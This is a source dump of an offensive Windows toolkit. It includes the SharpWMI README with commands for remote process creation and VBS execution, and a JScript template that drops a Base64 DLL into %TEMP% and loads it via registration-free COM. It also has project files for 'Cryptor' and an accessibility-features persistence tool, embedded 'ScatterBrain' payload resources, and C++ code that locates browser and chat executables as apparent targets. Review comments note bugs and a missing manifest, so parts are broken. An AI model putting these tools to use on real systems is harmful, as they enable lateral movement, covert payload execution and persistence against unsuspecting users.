5 | SharpWMI is a C# implementation of various WMI functionality. This includes local/remote WMI queries, remote WMI process creation through Win32_Process, and remote execution of arbitrary VBS through WMI event subscriptions. Alternate credentials are also supported for remote methods.
6 |
7 | [@harmj0y](https://twitter.com/harmj0y) is the primary author.
8 |
9 | SharpWMI is licensed under the BSD 3-Clause license.
10 |
11 | ## Usage
12 |
13 | Local system enumeration :
14 | SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
15 |
16 | Remote system enumeration :
17 | SharpWMI.exe action=query computername=HOST1[,HOST2,...] query="select * from win32_service" [namespace=BLAH]
18 |
19 | Remote process creation :
20 | SharpWMI.exe action=create computername=HOST[,HOST2,...] command="C:\temp\process.exe [args]"
21 |
22 | Remote VBS execution :
23 | SharpWMI.exe action=executevbs computername=HOST[,HOST2,...] [eventname=blah]
24 |
25 | Note: Any remote function also takes an optional "username=DOMAIN\user" "password=Password123!". The password is passed in cleartext on the command line, so it will appear in process-creation logs on the operating host (e.g. Sysmon event 1 or Security 4688 with command-line auditing) and in shell history — treat any credential used this way as exposed.
26 |
27 | Examples:
28 |
29 | SharpWMI.exe action=query query="select * from win32_process"
30 | SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\SecurityCenter2"
31 | SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
32 | SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process"
33 | SharpWMI.exe action=create computername=primary.testlab.local command="powershell.exe -enc ZQBj..."
34 | SharpWMI.exe action=executevbs computername=primary.testlab.local
35 | SharpWMI.exe action=executevbs computername=primary.testlab.local username="TESTLAB\harmj0y" password="Password123!"
36 |
37 |
38 | ## Compile Instructions
39 |
40 | We are not planning on releasing binaries for SharpWMI, so you will have to compile yourself :)
41 |
42 | SharpWMI has been built against .NET 3.5 and is compatible with [Visual Studio 2015 Community Edition](https://go.microsoft.com/fwlink/?LinkId=532606&clcid=0x409). Simply open up the project .sln, choose "release", and build.
43 |
--------------------------------------------------------------------------------
/regfree_com_activation_templates/jscript.js:
--------------------------------------------------------------------------------
// Template constants: name of the dropped file and the class name to request
// from the manifest. Both are fixed here (the VBScript variant randomizes them).
var fileName = 'testfile.tmp';
var classObj = 'coolObjectName';
// NOTE(review): the activation-context manifest XML (naming fileName and its
// comClass) was lost in extraction; a lone space is not a valid manifest.
var manifest = ' ';
var fso = new ActiveXObject("Scripting.FileSystemObject");
// GetSpecialFolder(2) = TemporaryFolder (the user's %TEMP%).
var dropPath = fso.GetSpecialFolder(2);
6 |
7 | var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters.charAt(A)+Base64.characters.charAt(o)+Base64.characters.charAt(B)}while(c>>16&255,e=a>>>8&255,n=255&a,h[d/4]=String.fromCharCode(t,e,n),64==i&&(h[d/4]=String.fromCharCode(t,e)),64==o&&(h[d/4]=String.fromCharCode(t));return r=h.join("")}
// Write a Base64 string to disk as raw bytes. Magic() (defined above) decodes
// the Base64 into a JS string; writing that through a text ADODB.Stream with
// the iso-8859-1 charset and copying it into a binary stream maps each char
// code 0..255 to exactly one byte. SaveToFile(..., 2) = adSaveCreateOverWrite,
// so an existing file is replaced.
// NOTE(review): TextStream is never closed (only BinaryStream is).
function binaryWriter(res, filename)
{
    var base64decoded = Magic(res);
    var TextStream = new ActiveXObject('ADODB.Stream');
    TextStream.Type = 2;
    TextStream.charSet = 'iso-8859-1';
    TextStream.Open();
    TextStream.WriteText(base64decoded);
    var BinaryStream = new ActiveXObject('ADODB.Stream');
    BinaryStream.Type = 1;
    BinaryStream.Open();
    TextStream.Position = 0;
    TextStream.CopyTo(BinaryStream);
    BinaryStream.SaveToFile(filename, 2);
    BinaryStream.Close();
}
12 |
// Placeholder for the Base64-encoded DLL bytes to drop.
var dynwrapX = 'B64DLL_BYTES_GO_HERE';

// Decode and write the DLL into the temp folder under fileName.
// NOTE(review): nothing in this script removes the dropped file afterwards.
binaryWriter(dynwrapX, dropPath + "\\" + fileName);


// Registration-free COM activation: Microsoft.Windows.ActCtx takes an
// application manifest as text, and CreateObject instantiates the comClass it
// declares without any HKCR registration. `manifest` is defined above; as
// shown on this page it is a single space (the XML was lost in extraction),
// so the template is incomplete.
var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
ax.ManifestText = manifest;

var DWX = ax.CreateObject(classObj);
22 |
--------------------------------------------------------------------------------
/Cryptor/Cryptor.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}
8 | Exe
9 | Cryptor
10 | Cryptor
11 | v4.0
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/ScatterBrain/ChatApplications.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "Helpers.h"
3 | #include "RegistryHelpers.h"
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
// Locates a 64-bit slack.exe for the current user.
//
// Reads the installed version from
// HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\slack\DisplayVersion
// and builds %LOCALAPPDATA%\slack\app-<version>\slack.exe.  The path is
// returned (heap string, caller-owned) only if FileExistsAndIs64Bit() from
// Helpers.h accepts it; otherwise NULL.
wchar_t* GetSlackPath()
{
    std::wstring slackVersionRegKey;
    slackVersionRegKey = L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\slack";

    std::wstring regValue(L"DisplayVersion");
    std::wstring valueFromRegistry;
    try
    {
        valueFromRegistry = GetStringValueFromHKCU(slackVersionRegKey, regValue);
    }
    catch (std::exception& e)
    {
        // Key or value missing: Slack is treated as not installed.
        return NULL;
    }
    size_t szSlackPath = sizeof(wchar_t) * MAX_PATH;
    wchar_t* slackPath = new wchar_t[szSlackPath];
    ZeroMemory(slackPath, szSlackPath);
    // NOTE(review): _wdupenv_s allocates its own buffer and overwrites
    // slackPath, so the new[] above is leaked and szSlackPath becomes the
    // length of the environment value; the lstrcatW calls below then write
    // beyond that allocation, and the buffer is later released with delete
    // rather than free.
    _wdupenv_s(&slackPath, &szSlackPath, L"LOCALAPPDATA");
    lstrcatW(slackPath, L"\\slack\\app-");
    lstrcatW(slackPath, valueFromRegistry.c_str());
    lstrcatW(slackPath, L"\\slack.exe");
    if (FileExistsAndIs64Bit(slackPath))
    {
        return slackPath;
    }
    delete(slackPath);
    return NULL;
}
39 |
// Returns the executable registered as the handler for sip: URIs, taken from
// the default value of HKLM\SOFTWARE\Classes\sip\shell\open\command, provided
// FileExistsAndIs64Bit() (Helpers.h) accepts it; otherwise NULL.  The caller
// owns the returned heap string.
wchar_t* GetSipApplicationPath()
{
    std::wstring sipLauncher;
    sipLauncher = L"SOFTWARE\\Classes\\sip\\shell\\open\\command";
    std::wstring defaultKeyName(L"");   // empty value name selects the key's (Default) value
    std::wstring defaultKeyValue;
    try
    {
        defaultKeyValue = GetStringValueFromHKLM(sipLauncher, defaultKeyName);
    }
    catch (std::exception& e)
    {
        // No sip: handler registered (or unreadable).
        return NULL;
    }
    // Writable copy, because wcstok_s modifies its input in place.
    size_t szTempValue = lstrlenW(defaultKeyValue.c_str()) + 1;
    wchar_t* tempValue = new wchar_t[szTempValue];
    ZeroMemory(tempValue, szTempValue);   // size is in wchar_t, so only half the buffer is cleared; wcscpy_s covers it
    wcscpy_s(tempValue, szTempValue, defaultKeyValue.c_str());
    wchar_t* buffer;
    // First token delimited by '"': for the usual "C:\...\app.exe" "%1" form
    // this is the quoted executable path; for an unquoted command it is the
    // whole string, arguments included.
    wchar_t* parts = wcstok_s(tempValue, L"\"", &buffer);
    std::wstring wstrRetVal(parts);   // NOTE(review): parts is NULL for an empty or all-quote value; not handled
    int i = 0;
    size_t index = wstrRetVal.find(L"\"", i);
    // Strip any remaining quotes; find() returns npos (>= any length) once none are left.
    while (index < lstrlenW(wstrRetVal.c_str()))
    {
        wstrRetVal.replace(index, 1, L"");
        i += 1;
        index = wstrRetVal.find(L"\"", i);
    }
    rtrimws(wstrRetVal);   // Helpers.h; presumably trims trailing whitespace
    size_t szRetVal = lstrlenW(wstrRetVal.c_str()) + 1;
    wchar_t* retVal = new wchar_t[szRetVal];
    ZeroMemory(retVal, szRetVal);
    wcscpy_s(retVal, szRetVal, wstrRetVal.c_str());
    delete(tempValue);   // NOTE(review): new[] released with scalar delete (here and for retVal below)
    if (FileExistsAndIs64Bit(retVal))
    {
        return retVal;
    }
    delete(retVal);
    return NULL;
}
82 |
// Returns the first chat client that passes the 64-bit file check, trying
// the per-user Slack install first and then the registered sip: handler.
// NULL if neither is found.  The caller owns the returned heap string
// (both producers allocate it).
wchar_t* GetChatApplication()
{
    wchar_t* slackPath = GetSlackPath();
    if (slackPath != NULL)
    {
        return slackPath;
    }

    wchar_t* defaultSipApp = GetSipApplicationPath();
    if (defaultSipApp != NULL)
    {
        return defaultSipApp;
    }

    return NULL;
}
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/AccessibilityFeaturesPersistence.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}
8 | Exe
9 | AccessibilityFeaturesPersistence
10 | AccessibilityFeaturesPersistence
11 | v4.0
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 | True
48 | True
49 | Resources.resx
50 |
51 |
52 |
53 |
54 | ResXFileCodeGenerator
55 | Resources.Designer.cs
56 |
57 |
58 |
59 |
60 |
61 |
62 |
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace SharpWMI.Properties {
12 | using System;
13 |
14 |
/// <summary>
/// A strongly-typed resource class, for looking up localized strings, etc.
/// </summary>
// This class was auto-generated by the StronglyTypedResourceBuilder
// class via a tool like ResGen or Visual Studio.
// To add or remove a member, edit your .ResX file then rerun ResGen
// with the /str option, or rebuild your VS project.
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class Resources {

    // Lazily created on first access to ResourceManager.
    private static global::System.Resources.ResourceManager resourceMan;

    // null means "use the current thread's UI culture".
    private static global::System.Globalization.CultureInfo resourceCulture;

    [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
    internal Resources() {
    }

    /// <summary>
    /// Returns the cached ResourceManager instance used by this class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Resources.ResourceManager ResourceManager {
        get {
            if (object.ReferenceEquals(resourceMan, null)) {
                global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SharpWMI.Properties.Resources", typeof(Resources).Assembly);
                resourceMan = temp;
            }
            return resourceMan;
        }
    }

    /// <summary>
    /// Overrides the current thread's CurrentUICulture property for all
    /// resource lookups using this strongly typed resource class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Globalization.CultureInfo Culture {
        get {
            return resourceCulture;
        }
        set {
            resourceCulture = value;
        }
    }

    /// <summary>
    /// Looks up a localized resource of type System.Byte[].
    /// Raw bytes of the "ScatterBrain" entry in Resources.resx; how Program.cs
    /// uses them is not visible here.  For analysts: the payload is carried as
    /// a managed resource inside this assembly rather than as a separate file,
    /// so it can be recovered with any .NET resource extractor.
    /// </summary>
    internal static byte[] ScatterBrain {
        get {
            object obj = ResourceManager.GetObject("ScatterBrain", resourceCulture);
            return ((byte[])(obj));
        }
    }
}
73 | }
74 |
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace AccessibilityFeaturesPersistence.Properties {
12 | using System;
13 |
14 |
/// <summary>
/// A strongly-typed resource class, for looking up localized strings, etc.
/// </summary>
// This class was auto-generated by the StronglyTypedResourceBuilder
// class via a tool like ResGen or Visual Studio.
// To add or remove a member, edit your .ResX file then rerun ResGen
// with the /str option, or rebuild your VS project.
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class Resources {

    // Lazily created on first access to ResourceManager.
    private static global::System.Resources.ResourceManager resourceMan;

    // null means "use the current thread's UI culture".
    private static global::System.Globalization.CultureInfo resourceCulture;

    [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
    internal Resources() {
    }

    /// <summary>
    /// Returns the cached ResourceManager instance used by this class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Resources.ResourceManager ResourceManager {
        get {
            if (object.ReferenceEquals(resourceMan, null)) {
                global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("AccessibilityFeaturesPersistence.Properties.Resources", typeof(Resources).Assembly);
                resourceMan = temp;
            }
            return resourceMan;
        }
    }

    /// <summary>
    /// Overrides the current thread's CurrentUICulture property for all
    /// resource lookups using this strongly typed resource class.
    /// </summary>
    [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
    internal static global::System.Globalization.CultureInfo Culture {
        get {
            return resourceCulture;
        }
        set {
            resourceCulture = value;
        }
    }

    /// <summary>
    /// Looks up a localized resource of type System.Byte[].
    /// Raw bytes of the "ScatterBrain" entry in Resources.resx; how Program.cs
    /// uses them is not visible here.  For analysts: the payload is carried as
    /// a managed resource inside this assembly rather than as a separate file,
    /// so it can be recovered with any .NET resource extractor.
    /// </summary>
    internal static byte[] ScatterBrain {
        get {
            object obj = ResourceManager.GetObject("ScatterBrain", resourceCulture);
            return ((byte[])(obj));
        }
    }
}
73 | }
74 |
--------------------------------------------------------------------------------
/ScatterBrain/ScatterBrain.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 | Header Files
44 |
45 |
46 | Header Files
47 |
48 |
49 | Header Files
50 |
51 |
52 | Header Files
53 |
54 |
55 | Header Files
56 |
57 |
58 | Header Files
59 |
60 |
61 |
62 |
63 | Source Files
64 |
65 |
66 | Source Files
67 |
68 |
69 | Source Files
70 |
71 |
72 | Source Files
73 |
74 |
75 | Source Files
76 |
77 |
78 | Source Files
79 |
80 |
81 | Source Files
82 |
83 |
84 | Source Files
85 |
86 |
87 | Source Files
88 |
89 |
90 | Source Files
91 |
92 |
93 | Source Files
94 |
95 |
96 | Source Files
97 |
98 |
99 | Source Files
100 |
101 |
102 |
--------------------------------------------------------------------------------
/ScatterBrain/Browsers.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "RegistryHelpers.h"
3 | #include "Helpers.h"
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 |
// Builds %PROGRAMFILES(x86)%\Google\Chrome\Application\chrome.exe and returns
// it as a caller-owned wide string if FileExistsAndIs64Bit() (Helpers.h)
// accepts it; otherwise NULL.
wchar_t* GetGoogleChromePath()
{
    char* path;
    DWORD sz = sizeof(char) * MAX_PATH;
    char* chromeExePath = (char*)malloc(sz);
    size_t len;
    // NOTE(review): neither the _dupenv_s status nor `path` is checked; when
    // the variable is unset, `path` is NULL by the time strcpy_s sees it.
    _dupenv_s(&path, &len, "PROGRAMFILES(x86)");
    char cToStr[] = "\\Google\\Chrome\\Application\\chrome.exe";
    strcpy_s(chromeExePath, sz, path);
    free(path);
    strcat_s(chromeExePath, sz, cToStr);
    wchar_t* result = CharToWcharT(chromeExePath);   // Helpers.h; its allocator is not visible here
    free(chromeExePath);
    if (FileExistsAndIs64Bit(result))
    {
        return result;
    }
    // Released with delete, so CharToWcharT is presumably expected to allocate with new — TODO confirm.
    delete(result);
    return NULL;
}
32 |
// Same as GetGoogleChromePath() for the per-user Chrome Canary ("SxS")
// install: %LOCALAPPDATA%\Google\Chrome SxS\Application\chrome.exe.
// Returns a caller-owned wide string, or NULL if the file is absent or not
// 64-bit according to FileExistsAndIs64Bit() (Helpers.h).
wchar_t* GetGoogleChromeSxSPath()
{
    DWORD sz = sizeof(char) * MAX_PATH;
    char* path;
    char* chromeExePath = (char*)malloc(sz);
    size_t len;
    _dupenv_s(&path, &len, "LOCALAPPDATA");   // status and NULL result unchecked
    char cToStr[] = "\\Google\\Chrome SxS\\Application\\chrome.exe";
    strcpy_s(chromeExePath, sz, path);
    free(path);
    strcat_s(chromeExePath, sz, cToStr);

    wchar_t* result = CharToWcharT(chromeExePath);   // Helpers.h
    free(chromeExePath);
    if (FileExistsAndIs64Bit(result))
    {
        return result;
    }
    delete(result);   // assumes CharToWcharT allocated with new — TODO confirm
    return NULL;
}
54 |
55 |
// Builds %PROGRAMFILES%\Mozilla Firefox\firefox.exe and returns it as a
// caller-owned wide string if FileExistsAndIs64Bit() (Helpers.h) accepts it;
// otherwise NULL.
wchar_t* GetFireFoxPath()
{
    DWORD sz = sizeof(char) * MAX_PATH;
    char* firefoxExePath = (char*)malloc(sz);
    char* path;
    size_t len;
    char ffPath[] = "\\Mozilla Firefox\\firefox.exe";
    _dupenv_s(&path, &len, "PROGRAMFILES");   // status and NULL result unchecked
    strcpy_s(firefoxExePath, sz, path);
    free(path);
    strcat_s(firefoxExePath, sz, ffPath);

    wchar_t* result = CharToWcharT(firefoxExePath);   // Helpers.h
    free(firefoxExePath);
    if (FileExistsAndIs64Bit(result))
    {
        return result;
    }
    delete(result);   // assumes CharToWcharT allocated with new — TODO confirm
    return NULL;
}
77 |
78 |
// Resolves the user's default https handler to an executable path.
//
// Step 1: HKCU\SOFTWARE\Microsoft\Windows\Shell\Associations\URLAssociations\
//         https\UserChoice\ProgId yields the browser's ProgId.
// Step 2: the default value of HKCR\<ProgId>\shell\open\command yields the
//         launch command, from which the (quoted) executable is extracted.
// Returns a caller-owned wide string if FileExistsAndIs64Bit() (Helpers.h)
// accepts that path, otherwise NULL.
wchar_t* GetDefaultBrowser()
{
    std::wstring regSubKey;
    regSubKey = L"SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\URLAssociations\\https\\UserChoice";
    std::wstring regValue(L"ProgId");
    std::wstring valueFromRegistry;
    try
    {
        valueFromRegistry = GetStringValueFromHKCU(regSubKey, regValue);
    }
    catch (std::exception& e)
    {
        // No UserChoice entry: nothing to resolve.
        return NULL;
    }
    // Build "<ProgId>\shell\open\command" in a temporary wide buffer.
    const wchar_t* openCommand = L"\\shell\\open\\command";
    size_t szTemp = lstrlenW(valueFromRegistry.c_str()) + lstrlenW(openCommand) + 1;
    wchar_t* temp = new wchar_t[szTemp];
    ZeroMemory(temp, szTemp);   // size is in wchar_t, so only half is cleared; wcscpy_s/wcscat_s write the rest
    wcscpy_s(temp, szTemp, valueFromRegistry.c_str());
    wcscat_s(temp, szTemp, openCommand);

    std::wstring hkcrRegSubKey(temp);
    delete(temp);   // NOTE(review): new[] released with scalar delete (also tempValue and retVal below)
    std::wstring hkcrRegValue(L"");   // empty value name selects the key's (Default) value
    std::wstring hkcrValueFromRegistry;
    try
    {
        hkcrValueFromRegistry = GetStringValueFromHKCR(hkcrRegSubKey, hkcrRegValue);
    }
    catch (std::exception& e)
    {
        // ProgId has no open command.
        return NULL;
    }
    // Writable copy, because wcstok_s modifies its input in place.
    size_t szTempValue = lstrlenW(hkcrValueFromRegistry.c_str()) + 1;
    wchar_t* tempValue = new wchar_t[szTempValue];
    ZeroMemory(tempValue, szTempValue);
    wcscpy_s(tempValue, szTempValue, hkcrValueFromRegistry.c_str());
    wchar_t* buffer;
    // First '"'-delimited token: the quoted executable for the usual
    // "C:\...\browser.exe" "%1" form; the whole string if unquoted.
    wchar_t* parts = wcstok_s(tempValue, L"\"", &buffer);
    std::wstring wstrRetVal(parts);   // NOTE(review): parts is NULL for an empty or all-quote value; not handled
    int i = 0;
    size_t index = wstrRetVal.find(L"\"", i);

    // remove quotes and whitespace
    // (find() returns npos, which is >= any length, once no quote remains)
    while (index < lstrlenW(wstrRetVal.c_str()))
    {
        wstrRetVal.replace(index, 1, L"");
        i += 1;
        index = wstrRetVal.find(L"\"", i);
    }
    rtrimws(wstrRetVal);   // Helpers.h; presumably trims trailing whitespace

    size_t szRetVal = lstrlenW(wstrRetVal.c_str()) + 1;
    wchar_t* retVal = new wchar_t[szRetVal];
    ZeroMemory(retVal, szRetVal);
    wcscpy_s(retVal, szRetVal, wstrRetVal.c_str());
    delete(tempValue);
    if (FileExistsAndIs64Bit(retVal))
    {
        return retVal;
    }
    delete(retVal);
    return NULL;
}
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/SharpWMI.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}
8 | Exe
9 | Properties
10 | SharpWMI
11 | SharpWMI
12 | v3.5
13 | 512
14 |
15 | publish\
16 | true
17 | Disk
18 | false
19 | Foreground
20 | 7
21 | Days
22 | false
23 | false
24 | true
25 | 0
26 | 1.0.0.%2a
27 | false
28 | false
29 | true
30 |
31 |
32 | AnyCPU
33 | true
34 | full
35 | false
36 | bin\Debug\
37 | DEBUG;TRACE
38 | prompt
39 | 4
40 |
41 |
42 | AnyCPU
43 | none
44 | true
45 | bin\Release\
46 |
47 |
48 | prompt
49 | 4
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 | True
65 | True
66 | Resources.resx
67 |
68 |
69 |
70 |
71 | ResXFileCodeGenerator
72 | Resources.Designer.cs
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 | False
84 | .NET Framework 3.5 SP1
85 | false
86 |
87 |
88 |
89 |
96 |
--------------------------------------------------------------------------------
/ScatterBrain/RegistryHelpers.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include
3 | #include
4 | #include
5 | #include
6 |
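/*! \brief Reads a REG_SZ value from HKEY_CURRENT_USER as a string.
 *  \param regSubKey Sub-key path below HKCU, e.g. L"Software\\Vendor\\App".
 *  \param regValue  Value name; an empty string selects the key's default value.
 *  \return The value data without its terminating NUL.
 *  \exception std::runtime_error if RegGetValueW returns anything other than
 *             ERROR_SUCCESS; the Win32 status code is carried in the message.
 */
std::wstring GetStringValueFromHKCU(const std::wstring& regSubKey, const std::wstring& regValue)
{
    size_t bufferSize = 0xFFF;   // Initial guess in wchar_t; grown below on ERROR_MORE_DATA.
    std::wstring valueBuf;       // Contiguous since C++11, so &valueBuf.at(0) is a valid out-buffer.
    valueBuf.resize(bufferSize);
    // RegGetValueW counts bytes while the string counts wchar_t; convert at the boundary
    // rather than passing the element count as if it were a byte count.
    auto cbData = static_cast<DWORD>(bufferSize * sizeof(wchar_t));
    auto rc = RegGetValueW(
        HKEY_CURRENT_USER,
        regSubKey.c_str(),
        regValue.c_str(),
        RRF_RT_REG_SZ,
        nullptr,
        static_cast<void*>(&valueBuf.at(0)),
        &cbData
    );
    while (rc == ERROR_MORE_DATA)
    {
        // On ERROR_MORE_DATA cbData holds the byte count the value needs
        // (terminating NUL included); round up to whole characters and make
        // sure the buffer actually grows.
        const size_t needed = (cbData + sizeof(wchar_t) - 1) / sizeof(wchar_t);
        bufferSize = needed > bufferSize ? needed : bufferSize * 2;
        valueBuf.resize(bufferSize);
        cbData = static_cast<DWORD>(bufferSize * sizeof(wchar_t));
        // Retry against the same root key: HKCU, not HKLM.
        rc = RegGetValueW(
            HKEY_CURRENT_USER,
            regSubKey.c_str(),
            regValue.c_str(),
            RRF_RT_REG_SZ,
            nullptr,
            static_cast<void*>(&valueBuf.at(0)),
            &cbData
        );
    }
    if (rc != ERROR_SUCCESS)
    {
        throw std::runtime_error("Windows system error code: " + std::to_string(rc));
    }
    // cbData now holds the bytes written, NUL included for REG_SZ; drop the NUL
    // so the returned wstring compares and concatenates as a normal string.
    valueBuf.resize(cbData / sizeof(wchar_t));
    while (!valueBuf.empty() && valueBuf.back() == L'\0')
    {
        valueBuf.pop_back();
    }
    return valueBuf;
}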
59 |
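/*! \brief Reads a REG_SZ value from HKEY_CLASSES_ROOT as a string.
 *  HKCR is the merged view of HKLM\Software\Classes and HKCU\Software\Classes,
 *  so per-user overrides are honoured.
 *  \param regSubKey Sub-key path below HKCR, e.g. L"<ProgId>\\shell\\open\\command".
 *  \param regValue  Value name; an empty string selects the key's default value.
 *  \return The value data without its terminating NUL.
 *  \exception std::runtime_error if RegGetValueW returns anything other than
 *             ERROR_SUCCESS; the Win32 status code is carried in the message.
 */
std::wstring GetStringValueFromHKCR(const std::wstring& regSubKey, const std::wstring& regValue)
{
    size_t bufferSize = 0xFFF;   // Initial guess in wchar_t; grown below on ERROR_MORE_DATA.
    std::wstring valueBuf;       // Contiguous since C++11, so &valueBuf.at(0) is a valid out-buffer.
    valueBuf.resize(bufferSize);
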